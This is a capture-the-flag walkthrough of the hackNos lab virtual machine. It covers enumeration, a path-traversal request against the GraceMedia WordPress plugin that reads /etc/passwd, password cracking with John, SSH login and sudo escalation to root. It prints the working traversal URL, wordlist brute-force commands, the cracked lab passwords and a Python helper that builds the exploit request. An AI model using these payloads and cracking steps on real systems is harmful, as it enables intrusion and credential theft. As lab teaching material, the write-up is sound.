Hack Nos

Flags: 2 (first user, second root). Learning: exploit, web application, enumeration, privilege escalation - www.hackNos.com. Format: Virtual Machine (VirtualBox - OVA). Operating System: Linux. Date release: 27 Nov 2019

URL: mhz_cxf: c1f

Difficulty: Easy

Author: hackNos: Os-hackNos

Enumeration

Set up the machine with a host-only adapter and run netdiscover to find the IP it was given. On my main OS (Kali Linux) the host-only interface is eth1:

netdiscover -i eth1

The machine shows up as 192.168.56.117, so scan all TCP ports with nmap and save normal output to a file named “nmap”. The SYN scan (-sS) needs root, hence sudo:

sudo nmap -sS -p- -A -oN nmap 192.168.56.117

Port 80 is open, so start by investigating it in a browser.

There is not much to see: this is the default Apache page, which means the real site probably lives under another path we have not found yet.

Let’s run dirb to discover paths we can enumerate further:

dirb http://192.168.56.117/ 

One of the results returned is /tsweb, so let’s see what is there:

This is clearly a WordPress site, so let’s run WPScan against it. Please note that newer versions of WPScan need an API token (available from their website) to report known vulnerabilities; without it you still get the enumeration results, just not the vulnerability data.

The following command enumerates users (u), vulnerable plugins (vp) and vulnerable themes (vt); append --api-token with your token if you have one:

wpscan --url http://192.168.56.117/tsweb/ -e u,vp,vt

We have found a user called “user”, which is worth noting.

We have also identified a vulnerable plugin called gracemedia-media-player which is susceptible to LFI.

The exploit:

Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)

require_once($_GET['cfg']); The parameter "cfg" is not sanitized, allowing inclusion of local files via /gracemedia-media-player/templates/files/ajax_controller.php

A link to the exploit DB page: ExploitDB
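To make the bug concrete, here is a small Python model of the vulnerable pattern next to the check that closes it. This is an added example, not code from the write-up or from the GraceMedia plugin (which is PHP); the sandbox layout, the file names and the function names are illustrative assumptions. The vulnerable function opens whatever the client sends, exactly like require_once($_GET['cfg']); the hardened one resolves the request and refuses anything that lands outside the templates directory.

```python
"""
Added example (Python, not code from the hackNos write-up or from the
GraceMedia plugin): models the vulnerable require_once($_GET['cfg'])
pattern and the containment check that closes it. The directory layout,
file names and function names are illustrative assumptions.
"""
import tempfile
from pathlib import Path


def build_sandbox() -> tuple[Path, Path]:
    """Constructed layout: <root>/etc/passwd is the secret the attacker
    wants; <root>/plugin/templates/files/ is the only directory the plugin
    should ever include files from."""
    root = Path(tempfile.mkdtemp(prefix="lfi-demo-"))
    (root / "etc").mkdir()
    (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")
    templates = root / "plugin" / "templates" / "files"
    templates.mkdir(parents=True)
    (templates / "default.cfg").write_text("player=gracemedia\n")
    return root, templates


def vulnerable_load(templates_dir: Path, cfg: str) -> str:
    """Equivalent of require_once($_GET['cfg']) run from templates_dir:
    the client-supplied name is opened as-is, so '../' sequences and
    absolute paths reach anything the web server's user can read."""
    return (templates_dir / cfg).read_text()


def hardened_load(templates_dir: Path, cfg: str) -> str:
    """Resolve the request and refuse anything outside templates_dir.
    Path.resolve() collapses '..' and follows symlinks, so the comparison
    is made on the real location, not on the string the client sent."""
    base = templates_dir.resolve()
    candidate = (base / cfg).resolve()  # an absolute cfg replaces base entirely
    if base not in candidate.parents:
        raise PermissionError(f"refusing {cfg!r}: resolves outside {base}")
    if candidate.suffix != ".cfg" or not candidate.is_file():
        raise PermissionError(f"refusing {cfg!r}: not a template file")
    return candidate.read_text()


if __name__ == "__main__":
    root, templates = build_sandbox()
    print(vulnerable_load(templates, "../../../etc/passwd"))  # traversal succeeds
    print(hardened_load(templates, "default.cfg"))             # legitimate request
    try:
        hardened_load(templates, "../../../etc/passwd")
    except PermissionError as err:
        print("blocked:", err)
```

Note that the check is done after resolution: a string filter that strips "../" would still let an absolute path or an encoded variant through, whereas comparing the resolved path against the allowed directory catches both. An allow-list of known template names is stricter still and is what a plugin with a fixed set of templates should use.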

Some WordPress plugin LFI bugs are only reachable by a logged-in user, so my first thought was to get credentials for this WordPress site.

Initially, I tried brute-forcing the password since Wordpress has an easy brute-force function with the following command:

wpscan --url http://192.168.56.117/tsweb --passwords /usr/share/wordlists/rockyou.txt --usernames user

This runs the rockyou.txt wordlist against the username “user” to see whether any entry works.

This did not work, so I tried reading the /etc/passwd file through the LFI using path traversal (OWASP has a good write-up of the technique).

This is exactly what the PoC (proof of concept) in the exploit does.

Visiting the following URL (no authentication needed) returns the passwd file of the system:

http://192.168.56.117/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

Reading through it, there is a user named flag whose password field holds a hash directly in /etc/passwd instead of the usual “x” pointing at /etc/shadow, which is why it is readable here:

$1$flag$vqjCxzjtRc7PofLYS2lWf/
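The two steps above (send the PoC request, then spot the account that carries its hash in passwd) are easy to do by eye on a small file but worth scripting for a real target. The following Python is an added example, not part of the original write-up: it builds the LFI URL the way the PoC does and parses passwd text, returning every account whose password field is a crypt(3) hash rather than “x”, in the user:hash form John accepts. The sample passwd is constructed; only the flag line is the one shown above. Function names are illustrative.

```python
"""
Added example (Python, not part of the original write-up): build the LFI
request the PoC uses and parse the /etc/passwd text it returns, pulling out
every account whose password field carries a crypt hash instead of "x".
SAMPLE_PASSWD is constructed; only the flag entry comes from the write-up.
"""
import re
from urllib.parse import urlencode

# Constructed sample of what the LFI returned; a real box has more lines.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1001:flag:/home/flag:/bin/bash
rohit:x:1000:1000:rohit:/home/rohit:/bin/bash
this line is not a passwd entry
"""

# crypt(3) identifiers: $1$ md5crypt, $2a/2b/2y$ bcrypt, $5$ sha256crypt,
# $6$ sha512crypt, $y$ yescrypt. "x", "*" and "!" are deliberately not matched.
CRYPT_PREFIX = re.compile(r"^\$(1|2[aby]|5|6|y)\$")
HASH_NAMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

AJAX_PATH = "wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"


def lfi_url(site: str, target: str, depth: int = 10) -> str:
    """Reproduce the PoC request: `depth` copies of ../ before the target.
    Surplus ../ are harmless because / has no parent directory."""
    cfg = "../" * depth + target.lstrip("/")
    query = urlencode({"ajaxAction": "getIds", "cfg": cfg}, safe="/")
    return f"{site.rstrip('/')}/{AJAX_PATH}?{query}"


def parse_passwd(text: str) -> list[dict]:
    """Split passwd lines into their seven fields; anything else (HTML or
    plugin output wrapped around the file) is skipped rather than fatal."""
    entries = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue
        user, pw, uid, gid, _gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        entries.append({"user": user, "passwd": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries


def embedded_hashes(text: str) -> list[tuple[str, str, str]]:
    """(user, hash, algorithm) for every entry whose password field is a hash."""
    found = []
    for entry in parse_passwd(text):
        match = CRYPT_PREFIX.match(entry["passwd"])
        if match:
            found.append((entry["user"], entry["passwd"], HASH_NAMES[match.group(1)]))
    return found


def john_input(text: str) -> str:
    """user:hash lines in the passwd-style format john reads directly."""
    return "".join(f"{user}:{h}\n" for user, h, _ in embedded_hashes(text))


def login_users(text: str) -> list[str]:
    """Accounts with a usable login shell: SSH candidates once a password is known."""
    return [e["user"] for e in parse_passwd(text)
            if not e["shell"].endswith(("nologin", "false"))]


if __name__ == "__main__":
    print(lfi_url("http://192.168.56.117/tsweb", "/etc/passwd"))
    for user, h, algo in embedded_hashes(SAMPLE_PASSWD):
        print(f"{user}: {algo} hash {h}")
    print("john input:\n" + john_input(SAMPLE_PASSWD), end="")
    print("login shells:", login_users(SAMPLE_PASSWD))
```

Writing the john_input() result to a file avoids the shell-quoting trap of echoing a $1$... string by hand, and the algorithm name tells you which --format to pass to John.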

The $1$ prefix marks this as an md5crypt hash. I saved it to a file named “hash” and asked John to crack it. Use single quotes here: inside double quotes the shell would expand $1, $flag and $vqjCxzjtRc7PofLYS2lWf as (empty) variables and write an empty line to the file. Keep the trailing “/” as well, it is part of the hash.

echo '$1$flag$vqjCxzjtRc7PofLYS2lWf/' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash

We got a password!

topsecret

Let’s try to SSH into the machine as flag with that password:

ssh flag@192.168.56.117

We are logged in as flag.

Privilege Escalation

The cd command is blocked in flag’s shell (a restricted shell), so we have to enumerate with ls and absolute paths instead.

I checked the WordPress config file and found database credentials worth noting:

cat /var/www/html/tsweb/wp-config.php

Some more enumeration of the system reveals something interesting in a backup directory under /var/backups, a file containing another password hash:

ls -la /var/backups/passbkp

It is another md5crypt hash, so let’s crack it like before. Again I saved it (single-quoted) to a file called hash:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt hash

And the following password has been found:

!%hack41

The /home directory also lists a user called rohit, so let’s try this password over SSH for that account:

ssh rohit@192.168.56.117

Let’s check sudo Privileges:

sudo -l

rohit can run any command as root through sudo, so the following gives us a root shell:

sudo /bin/bash

And we have root!

id
cd /root
ls

Written on May 21, 2020